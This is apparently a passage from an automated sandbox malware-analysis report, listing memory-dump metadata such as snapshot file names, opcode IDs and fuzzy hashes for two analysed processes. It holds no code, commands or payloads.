                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 443fddb68fb6d66ed5831ca4d589c4f55715fda74097dddd6c42841218524c27
                                                                                            • Instruction ID: d7f97af3c3128153352c8784bf2258abccb2c23d6c184c2d99d6e8648d6e6ef2
                                                                                            • Opcode Fuzzy Hash: 443fddb68fb6d66ed5831ca4d589c4f55715fda74097dddd6c42841218524c27
                                                                                            • Instruction Fuzzy Hash: D541E5B180D61E8EDB56EFB4D4446EEBBB0FF19300F10056AD509E7192DA78A945CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5527c83664f12b72471e1944518c21774fa1e581a6511dbe7a602a8a412e6248
                                                                                            • Instruction ID: 0ab5d227d7f08b1686cf6d54fd7071a403abcdd8ad340626fc7aacc51cdc3172
                                                                                            • Opcode Fuzzy Hash: 5527c83664f12b72471e1944518c21774fa1e581a6511dbe7a602a8a412e6248
                                                                                            • Instruction Fuzzy Hash: 8A41F674A1C91D8FDF98EF68C895BACB7F1FB58305F5480AD904EE3255CE74A8818B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 11eeaec1591b149b232ac78d780f4c688844d443a9e6d86ebcc85dfab78f4e00
                                                                                            • Instruction ID: e42f2960a28578f8c9ca70d6b6ced9546aee39741f84d0ef7ea462a45a17b964
                                                                                            • Opcode Fuzzy Hash: 11eeaec1591b149b232ac78d780f4c688844d443a9e6d86ebcc85dfab78f4e00
                                                                                            • Instruction Fuzzy Hash: 3431CA7091891D8FDF99EF68C855BEEBBB2FB98305F10412ED509E3295CB349845CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 55a691429184649d329e7d16b1ed68dc1dc9196864796df525853b558a623ba7
                                                                                            • Instruction ID: e9cd416ab1c39766f2ff4f5ea5a82659b63bd0a504545f2cd431d8c3bd02f74d
                                                                                            • Opcode Fuzzy Hash: 55a691429184649d329e7d16b1ed68dc1dc9196864796df525853b558a623ba7
                                                                                            • Instruction Fuzzy Hash: 0C416BB0D0D6598FE745EFB8C8956E9BBF1FF45301F5041BAD009D72A2CA389881CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 05ef5efc6f050ccecddfc9e4a585bb2bd51a7785da9305177d64781902b933b3
                                                                                            • Instruction ID: d12649b425ec338b64f3e71789ec8cfd929956b66ad6c56d70c72b7a0ee7c915
                                                                                            • Opcode Fuzzy Hash: 05ef5efc6f050ccecddfc9e4a585bb2bd51a7785da9305177d64781902b933b3
                                                                                            • Instruction Fuzzy Hash: 3A3117A181DECA4FE751EF3CC8A46E93FA0FF56354F5541BAE989861A3CF245845C380
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb18ea2b4b3faeaf871713bb95e31a5c5e5a7f0f9a8679695613519f9de55f51
                                                                                            • Instruction ID: a979d542f05a3f3ba63358ae290af9557d85f891f8532dc7eab6012ce3f523b2
                                                                                            • Opcode Fuzzy Hash: fb18ea2b4b3faeaf871713bb95e31a5c5e5a7f0f9a8679695613519f9de55f51
                                                                                            • Instruction Fuzzy Hash: D1217A7191CA5D8FDB81EF68D855AEDBBF1FF59311F04016AE408E32A2CA24A8518B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction ID: 85acf573275d38f1fae65c926555df358e7d8d094002cb9c448600fda9c73a55
                                                                                            • Opcode Fuzzy Hash: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction Fuzzy Hash: 38312B70D0D61A8BEBA9EE24C5593B9B6A1EF54300F1045BDD95DD32A2CE38A981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d5fa7b6cef9e535976e6fdfce9775b22612c0c6fda95c9da3c6eaaab1ea05d18
                                                                                            • Instruction ID: ca52b237813064ae153106544972b360c91db2995fdd3e7fdb06b85cb8038686
                                                                                            • Opcode Fuzzy Hash: d5fa7b6cef9e535976e6fdfce9775b22612c0c6fda95c9da3c6eaaab1ea05d18
                                                                                            • Instruction Fuzzy Hash: 0A2160B1D0D60A8AEB68FF74C9556B97BB1EF84310F10447ED61E932E2DE38A941CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2884d97d0a76a854476fd92c45c65455bc4594c3069c94687f01e548baed1cc7
                                                                                            • Instruction ID: 721b76014edf632b0d9d9cbd25126fc9bf9f034262fc95b5992aaaa3f43a382e
                                                                                            • Opcode Fuzzy Hash: 2884d97d0a76a854476fd92c45c65455bc4594c3069c94687f01e548baed1cc7
                                                                                            • Instruction Fuzzy Hash: 58219F74A1891DCFDF84EF98D495EEEBBB1FF68301F10416AE50AE3255DA34E8418B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ace328f5451481c42df0bde4088486bf2fff26352a16b9eaa9973b101ba06b9f
                                                                                            • Instruction ID: 11c22f4d02570dbf242ec174e55a2cacf39006966d2095c81b14c757fd33831d
                                                                                            • Opcode Fuzzy Hash: ace328f5451481c42df0bde4088486bf2fff26352a16b9eaa9973b101ba06b9f
                                                                                            • Instruction Fuzzy Hash: 5D215E7090D7494EEB69AE74C8157B97BB1EF45310F0404BAD509D32D2CE3858458B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86bdf8977953bfab2f747c2ae1002e87a96844bc3e892db6643eba56ff223e01
                                                                                            • Instruction ID: 51f8b958882c961d3bb50f4d9fcdea2774e11db0a548e3fe558062c4d3927469
                                                                                            • Opcode Fuzzy Hash: 86bdf8977953bfab2f747c2ae1002e87a96844bc3e892db6643eba56ff223e01
                                                                                            • Instruction Fuzzy Hash: 8A118BB090E78A4EEB6AAF74C8247B97FB1AF86310F0844BAD549D72D3CD289845C751
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9702cfb20aff9ad603cca7eb05dfc12709faa99199e85e359dde4db42554a07d
                                                                                            • Instruction ID: d161d0c32e3d0d070fdece93f33831c4ccae110a3ab3afbcbfe7bba227925d2c
                                                                                            • Opcode Fuzzy Hash: 9702cfb20aff9ad603cca7eb05dfc12709faa99199e85e359dde4db42554a07d
                                                                                            • Instruction Fuzzy Hash: 5B1191B0D0DA1A8BEB68BE38C5057BA7AB1EF95310F00457DD61ED32E1CE38A8458A41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O5K$@O5K$PO5K$`O5K$pP5K
                                                                                            • API String ID: 0-3199577557
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-2063274034
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#4K
                                                                                            • API String ID: 0-533413016
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e5d20aa98dbb7ff748962150ffe70e5c160aced9bc7010c7b560972cbfb06d0
                                                                                            • Instruction ID: ae98aa2ac642b82b1062e6a1b0a5199ec72d3a79a16cdc2e57c061051c3142a5
                                                                                            • Opcode Fuzzy Hash: 9e5d20aa98dbb7ff748962150ffe70e5c160aced9bc7010c7b560972cbfb06d0
                                                                                            • Instruction Fuzzy Hash: 3851B3B0E18A1D8FDF94EFA8C855BADBBB1FF58701F10016AD409E7691CA746881CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction ID: c62cf88da4c323bbdf3cfe9a44ae960f6e4fe09460d94aceaa899c4c97f84aa0
                                                                                            • Opcode Fuzzy Hash: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction Fuzzy Hash: 2251FBB0D18A5D8FDF94EFA8C9546EDBBB2FF58301F14412AD409E7295CB345845CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8a6d20f82a72f54a6ff2dedc6be5096850c465f74d74daa8d673b32b3a9e6f4
                                                                                            • Instruction ID: 46c78495da2a3e149eb9c35c30381778a9b39a5b2a8b8d1e88b63c61a5e38840
                                                                                            • Opcode Fuzzy Hash: d8a6d20f82a72f54a6ff2dedc6be5096850c465f74d74daa8d673b32b3a9e6f4
                                                                                            • Instruction Fuzzy Hash: CD419AB0A1C91D8FDB45EFA8D845AEEBBB1FF58300F1001BAE409E7295DA35A9018B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 85483994d43c93b59ac444c0e65b7d949cb6127c39f659df26af63db8b194771
                                                                                            • Instruction ID: 5b31a6443313be1147bfb45b4d32ecb998da8439409f126371753796448815b1
                                                                                            • Opcode Fuzzy Hash: 85483994d43c93b59ac444c0e65b7d949cb6127c39f659df26af63db8b194771
                                                                                            • Instruction Fuzzy Hash: F651697180D28A8FDB56EF74C8A52FEBBB0EF1A300F0545BAD505E7192DB385A48CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbb096994bb4f416965765246029d4fd59a385a952961243060f55d4404461b1
                                                                                            • Instruction ID: 5dd1e6b9c437241f6360db80c73b5612ca333c7e40eedac8029b6c58ddd3b715
                                                                                            • Opcode Fuzzy Hash: fbb096994bb4f416965765246029d4fd59a385a952961243060f55d4404461b1
                                                                                            • Instruction Fuzzy Hash: CC4127B1C09A1D8FDB55EFB4D4486EEBBB1FF19300F50057AE409E3192DA78A945CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction ID: 4c421fe0df8d6ea25e6bf716aec7ad76b5ec9c5437eb9d75024a5ac02cc54d90
                                                                                            • Opcode Fuzzy Hash: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction Fuzzy Hash: 4441F974A1891D8FDFA8EF68D895BACB7F1FB58705F5480A9D04EE3251CE74AC818B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction ID: a9cb4e365ad23b9831725f4aa03d4e575c30127b084bcf6bb78e917607037863
                                                                                            • Opcode Fuzzy Hash: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction Fuzzy Hash: 2631CB7091891D8FDF94EF68C955BEEBBB2FF98301F10452AD509E7295CB34A845CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22c5ebc4f5855224326c482726cfaa16431ea6df4a91db8c562eb21d5b4350ce
                                                                                            • Instruction ID: bd7723ae5c2bf192ff54c2cf615c6a19961a05cb90a7f362ab9b7c24c5ad6cdb
                                                                                            • Opcode Fuzzy Hash: 22c5ebc4f5855224326c482726cfaa16431ea6df4a91db8c562eb21d5b4350ce
                                                                                            • Instruction Fuzzy Hash: 24417BB0D096598FEB45EFB4C8596EDBBB2FF49301F4041BAD009D76A2CB389881CB00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73f4ce737ef126c1d83a3028884fb9910ba3e7f7405c40424e9f83d75e6a23e8
                                                                                            • Instruction ID: e3d8ea06d633098d2bdc5352ee8a76077629e443008428c250aed56102df1b24
                                                                                            • Opcode Fuzzy Hash: 73f4ce737ef126c1d83a3028884fb9910ba3e7f7405c40424e9f83d75e6a23e8
                                                                                            • Instruction Fuzzy Hash: 4B3127A181DACA8FEB51FF3CC8241E97FA0FF5A314F4541BAE98887593CA249845C781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction ID: 4a118f80d29acffadd2620a9fba48b8696279ebd510abe360731b6b5fe250a76
                                                                                            • Opcode Fuzzy Hash: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction Fuzzy Hash: 28217CB1908A5D8FDB81EF68D845AEDBFF1FF59311F00016AE408E72A2CA2498518790
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction ID: 432b2cf65856f07ee614a3a6a66f1d6796b3a3c403ab108cc8ef2047a92d172e
                                                                                            • Opcode Fuzzy Hash: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction Fuzzy Hash: E3313C70D1961A8BE7A9EF34C5593B9B7A1EF58300F1045B9D95DE32E2CE38A981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction ID: e5071992ebbd2b7bf7938c3c68a92fc153c802d39167efd51e264a03ea8cc777
                                                                                            • Opcode Fuzzy Hash: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction Fuzzy Hash: 112195B1D1D60A8BE768FF74C5456B9BBB1EF88310F104079D51D935E2DE38A941CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 523eacced990334f353bbaf829b7e0b5ee1de86401848d54d1ef95ec8d53d481
                                                                                            • Instruction ID: a90961b2d0e2d26900273c7c05e8c916fe639d1a0274d860fb21a809bbc7d84f
                                                                                            • Opcode Fuzzy Hash: 523eacced990334f353bbaf829b7e0b5ee1de86401848d54d1ef95ec8d53d481
                                                                                            • Instruction Fuzzy Hash: 45219F74A1891D8FDF84EF98D495EEEBBB1FF6C301F10416AE50AE3255CA34E8418B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ef1a7b38da4eca1f9a4612c545b2a319db310a3dfadde5a8d8c3bf78c204537
                                                                                            • Instruction ID: 076480a7b0ea5822112c9a8fb66e2d8260d65a5178a86c537296de41b80a8a20
                                                                                            • Opcode Fuzzy Hash: 6ef1a7b38da4eca1f9a4612c545b2a319db310a3dfadde5a8d8c3bf78c204537
                                                                                            • Instruction Fuzzy Hash: 38214C7090E7498FE769EF68C8197B9BBB1EF49310F0401BAD509D32D2DE38A845CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fee431c335face6f7a6937469221c3395702ab4457be69afcd241e7c5da89ef0
                                                                                            • Instruction ID: 9e635a9282343df4108c5cc148ec0bc522cf127d5a1cd3b3710e20dd89dcefdb
                                                                                            • Opcode Fuzzy Hash: fee431c335face6f7a6937469221c3395702ab4457be69afcd241e7c5da89ef0
                                                                                            • Instruction Fuzzy Hash: 66117F7090D7894FE76AAF74C4157B97FB1AF46310F0440BAD449D71D3CD689845C751
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68ec592a14293e49d658064820d317198f1daed43a3aed5d081ad96bbd65d7d5
                                                                                            • Instruction ID: 920d0dc990f740f35aed7ca2cafa6bcf9a5334bc62c32d04559868c48f5a3bd7
                                                                                            • Opcode Fuzzy Hash: 68ec592a14293e49d658064820d317198f1daed43a3aed5d081ad96bbd65d7d5
                                                                                            • Instruction Fuzzy Hash: BF11A770D1D64E8BE768FE38C5057BABAF1EF99310F104579D51EE32E1DE38A8058A41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • Opcode Fuzzy Hash: 0b420466c0fb1f5e44d8772a3bf6b6e0240b5a63360f43d93f18ea681114a1fe
                                                                                            • Instruction Fuzzy Hash: 3451C8B0D18A5D8FDF99EFA8C8546EEBBB2FF58301F14412AD509E7295CB349845CB40
                                                                                            Memory Dump Source
